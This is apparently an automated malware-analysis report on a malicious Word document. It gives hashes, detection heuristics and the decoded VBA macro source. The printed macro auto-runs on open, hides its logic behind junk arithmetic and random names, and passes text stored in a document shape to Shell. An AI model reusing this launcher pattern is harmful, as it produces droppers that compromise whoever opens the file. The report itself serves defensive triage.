Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 318e122cc018792b…

MALICIOUS

Office (OLE)

140.0 KB Created: 2018-12-06 19:10:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 2ebf05c7ff8c1da7ee7b702bcd04f78f SHA-1: 20ec5df658dc05bdf60c8f267318165dd97596f8 SHA-256: 318e122cc018792b73feb73b9cb38616094dcbaaf6930241314d4ac6c38422e2
292 Risk Score

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6775287-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6775287-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    VVmOZw = Array(oiqflON, JOBls, iuOAOARQL, Interaction _
.Shell(XwafbiRZuaT, KBnRTXjCFO), nHiFWbrB)
   FbwPoRcwTwIMbQjbqXi = 270409642 * CInt(28766685) + IFrWjGMiwjRSqJCXQl + CLng(119904062 + Sgn(WmhrbRDLJOkQXmS) - 302517960 * 160152702) - kWklBcvJZZYTGtWzz + Chr(XAuPCAYhwAvEqIwwAv) * 147554186 / CStr(241274724) / (FvSrinqIquZpwWXXVTkMU / 205002030 / OVjQUIsabMmSEcXYNiZGGVP / Fix(maafcmXPZAEWuXVzwTwcKDT + Hex(zvWivZosFodtiMwooWsDYBdq) + 81004297 + CBool(166947172 + mWnkjHiihPtUAML)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
qnZWWh
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6130 bytes
SHA-256: 2d51c9c0026ecd7ddc391ecd0482844d6515b439aefc27041946c736dd52a786
Detection
ClamAV: No threats found
Obfuscation or payload: likely
141 of 178 identifiers look randomly generated (e.g. 'sHvcJdnHtQhLrIdjUabitEwB') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UjIijMvdkAT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
qnZWWh
End Sub

Attribute VB_Name = "rnunwizviwZHbi"
Function qnZWWh()
On Error Resume Next
   ovatdnLVZVLPwYcHBORGZod = 10037019 * CInt(142484358) + UrVbBZXIuWcjJtlwqtiKr + CLng(233324552 + Sgn(icTvMUzRYXvSUAwTlsq) - 194330748 * 41804798) - VEXVawjTLplSnwhiKouE + Chr(IObRwrawSAFSCH) * 99494603 / CStr(153431847) / (tBhFMFhBNzlGhBiBcMqwEcG / 60963421 / tpfAkqSHUutXzwIuPl / Fix(pplwXRavYamRuYiTQBBcISz + Hex(GpiiQiCoqOUjIqIj) + 67047674 + CBool(314056443 + jhdzwOdrsOIjWqYsimvfpYw)))
   ZrzGLacTVDwTLzaWl = 21253342 * CInt(138785575) + KdsJzTrjhpjYGsJLTnB + CLng(283405170 + Sgn(ialZiMuoWVbWXEvwqHsjsm) - 211691679 * 133163984) - NSnOCzBiljCHkUGzuLU + Chr(BioNMdjJHvsuRBR) * 298215737 / CStr(45389027) / (TXaslXtrFmlmzbLMWii / 173472482 / ZRrWqoIpiCNqVr / Fix(hIwQUUXtYVzQiEfnOjXuFiWv + Hex(lBWkXvcjPfNiOGhBYTAsX) + 167803432 + CBool(241792731 + PzJzzqwlAjjTAJ)))
   sTzwfVFGhKZDXhPzMjN = 340420668 * CInt(80418038) + apmhvLSvmjffMpmSR + CLng(332864346 + Sgn(vAdDkRNfvdoEDPZsH) - 68509477 * 332487776) - unlYtXsVZKtRPiQSzmB + Chr(hfWSzbbPmziITYXHO) * 27224329 / CStr(65211423) / (ZsFkjWpVzGuUIjsO / 114405357 / bRvdicjlwqLIEtcoqp / Fix(liamGPfCKzkfIqvcsRv + Hex(cEwYwKrCBsUsDofk) + 5772080 + CBool(203214435 + ODaVmOLCRIQjWvfzhkCnvY)))
   VJOQrkrTSHkbwUnNA = 225364352 * CInt(209469183) + sUsmQTiJzuljXOfADp + CLng(259106199 + Sgn(miouhUXcUVNOUbXA) - 113380004 * 185650165) - YBiWXVADhpmJLu + Chr(hKfwEwwFobjWPwrijb) * 270523908 / CStr(97983515) / (DLQYhQpniLCTAtMV / 122876985 / EcvturwlGqKChWfJiw / Fix(aXfHSGPiDPDiJREkm + Hex(JRZZvKwdfdjnqOOFs) + 338562354 + CBool(161519525 + dniMvWCLAldltvUhpA)))
   ZuwYsAnwiRJjuDcNL = 192360324 * CInt(149292571) + qfiiDnDYSwvlEiwvzaGqG + CLng(284473452 + Sgn(HubcfGtmLzLXtQTVEwOjlWX) - 183951798 * 77768362) - jNkXjcznXkcLXSY + Chr(jmtKFffFBtrKGkWz) * 107385540 / CStr(178038298) / (jBoTiYFtjstZwHanliA / 337584247 / hiVmlojmOcuwts / Fix(uTLmzlwMHUuDjzk + Hex(PbXwXShwjZHUQwcDO) + 115584281 + CBool(296813228 + XOzQlRORrkAodLfUV)))
   wlkLSisNhjWWJD = 8366093 * CInt(74358299) + spkIUimlkoCVEkwpFCnif + CLng(249281022 + Sgn(OUnzvJzIYaXcQorbCzZiqq) - 292665272 * 191208431) - YjDANcFGBWohjrckjiujIiBN + Chr(klGDwXbKEXcvHKwSVPR) * 17152941 / CStr(304111570) / (GzzJMzwmqfpZdrzCCw / 84105702 / iUzoYUwOmSjLhRfJFo / Fix(dNRjwGhhGSSMTpXo + Hex(zJksBiAXwisMMqzOmiJNn) + 16731796 + CBool(226116686 + npvTGPVKctLwDTciRJAbpUu)))
Set IpamzPY = UjIijMvdkAT.Shapes(QDYFMRlW + "sZGPnCXauoPl" + MdZHmcuA).TextFrame
   trfhcWSlwlmUVorbfHMK = 127469432 * CInt(129080622) + IfqPXLnAjYZVijzJ + CLng(214890118 + Sgn(szzCMMUNWimlnJ) - 167563748 * 204716081) - BlGuZJlFvwTMujzfHb + Chr(OGSiuJpIOulPvzJzYZ) * 54946452 / CStr(123748075) / (MwRPBBbwpFfiDQQjGMkjAW / 72348740 / jXMliZFzIhBKBOtI / Fix(JZoFhsitORNXjoplH + Hex(doqQPAjaWOGhsSbVqzWEw) + 206679658 + CBool(196792563 + TIsbZsMZuiPUYtJoYHVUmjZ)))
   rRGtLroRADhWuoA = 296450611 * CInt(65342318) + KZpiiWvTmzXzmAMkSsz + CLng(297673175 + Sgn(GrtuQcUzcJjndWtQJj) - 234628449 * 326263145) - EquARjKJWItQADhvoRtbUJn + Chr(MIiSTIIPvfCAztzvKpGAmW) * 189472951 / CStr(120487925) / (UVRpWXuDDnICrpNz / 201281890 / VBhwuSwQiDnDqfMGwn / Fix(ZZHHzvFrtTzsAIBHQiYazrF + Hex(qPAzcpkqZIEvNujAobEziKm) + 307993083 + CBool(271321970 + vcaMriTOQhvIODiJTsD)))
XwafbiRZuaT = IpamzPY.ContainingRange + uYmYmI + dGIDtIQ + WcziCF + AOVru + iZhBaTv + kEpAKKas + jcursTG + uuojOYY
   JvFRCQERolnjRpRBwzd = 275754220 * CInt(31166805) + AqzRpEvrjtfuzNKmt + CLng(28197580 + Sgn(JzELzBnnIwARNVtuPS) - 242795730 * 177803182) - VwCuAXsDrJEYTuSwiBPBQmvj + Chr(SZDTuUIdWnBCRwivjRm) * 315509403 / CStr(294327436) / (abwkQVZiiASSizokzpvvzGR / 304089512 / ElGhVIniYzcUJDnE / Fix(FAjwOhGzUzAzvTKEWMkSBN + Hex(ijJwMQnlIrKBQKPqDAhBLnl) + 192320597 + CBool(213685300 + QmrDlmrHEPEjtijLr)))
   wijRnzNHkoHjLLUqh = 313026809 * CInt(113138252) + CXiVYhmFdhriODHQoiIjdI + CLng(260212537 + Sgn(YmLIwptSAiPbEKsFNIdCw) - 160145528 * 137011669) - DDCzmkLujwzmViH + Chr(oZifnjMdpDTVfklzRDEumu) * 205931237 / CStr(104015059) / (VsHNGjjBoOXppUXqYKj / 114664437 / PwLzUSZMBuuSISoEQiTjUq / Fix(NKcjhEOjvwiGtwQmRK + Hex(mTdXjBilIbQhVYbznrjrIn) + 69262823 + CBool(333802581 + ZMuIzvCZfEDkmvhwSG)))
Const KBnRTXjCFO = 0
   ZXLEnwwqmibPQudUNqjRhQb = 222702627 * CInt(234896881) + wVSSzwPSsRprmKKCPMRHc + CLng(132769557 + Sgn(oWwdMKIviUCwbXTidAwC) - 81932653 * 207465908) - DWHfBPQcIdpiwBUCIk + Chr(LWkLjiwhnHiRTIAuHF) * 205056610 / CStr(45987836) / (NstUltXcIzpSqUwTKXAE / 221675515 / UiLVWvGNwddpziqrzlYE / Fix(KozcoCbwhiCwkYPIPWbW + Hex(AMoAWUcTaOjcwKpMtitfQPwb) + 286204769 + CBool(88322063 + aihOzijJbLcRiwd)))
   tGkosKowbSHXOtm = 192828507 * CInt(332237974) + ZrRGKwuKLVmisBrOiFPH + CLng(62987084 + Sgn(BiaBwpQjVsCpiGnnvluhz) - 126727282 * 78465682) - ZGfAOhNrWqpjjJCEubztbDTk + Chr(rKiNbjiWdbpKQVofLTr) * 115918932 / CStr(30204219) / (lipnYUSVWmuZXXi / 196896381 / HGMCiNuiGKNPkbTVkYvXoLO / Fix(HFDQqwRwhYkKsE + Hex(VvJRJFFmKaDmwn) + 43345010 + CBool(41191631 + sHvcJdnHtQhLrIdjUabitEwB)))
VVmOZw = Array(oiqflON, JOBls, iuOAOARQL, Interaction _
.Shell(XwafbiRZuaT, KBnRTXjCFO), nHiFWbrB)
   FbwPoRcwTwIMbQjbqXi = 270409642 * CInt(28766685) + IFrWjGMiwjRSqJCXQl + CLng(119904062 + Sgn(WmhrbRDLJOkQXmS) - 302517960 * 160152702) - kWklBcvJZZYTGtWzz + Chr(XAuPCAYhwAvEqIwwAv) * 147554186 / CStr(241274724) / (FvSrinqIquZpwWXXVTkMU / 205002030 / OVjQUIsabMmSEcXYNiZGGVP / Fix(maafcmXPZAEWuXVzwTwcKDT + Hex(zvWivZosFodtiMwooWsDYBdq) + 81004297 + CBool(166947172 + mWnkjHiihPtUAML)))
   uDdppFCshMtjofavw = 290503212 * CInt(222938518) + UYMkKsHPfawlOqsiuLKbXaU + CLng(331391707 + Sgn(UOTiwnDKbzWqsizwmNHPI) - 121126368 * 329046829) - vBliGTtEOBpdohjntamtWn + Chr(jMckNNiaCQfmuC) * 139078418 / CStr(27505282) / (ERcqpUKFiTWifEQ / 55141507 / EVijfrfbnMIvol / Fix(WfoELKrrRijtMsWMPdu + Hex(zaYYawPBICKpiwLAPMzpNdME) + 314655307 + CBool(326224728 + jRAsRunYwGQdOuqjPU)))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.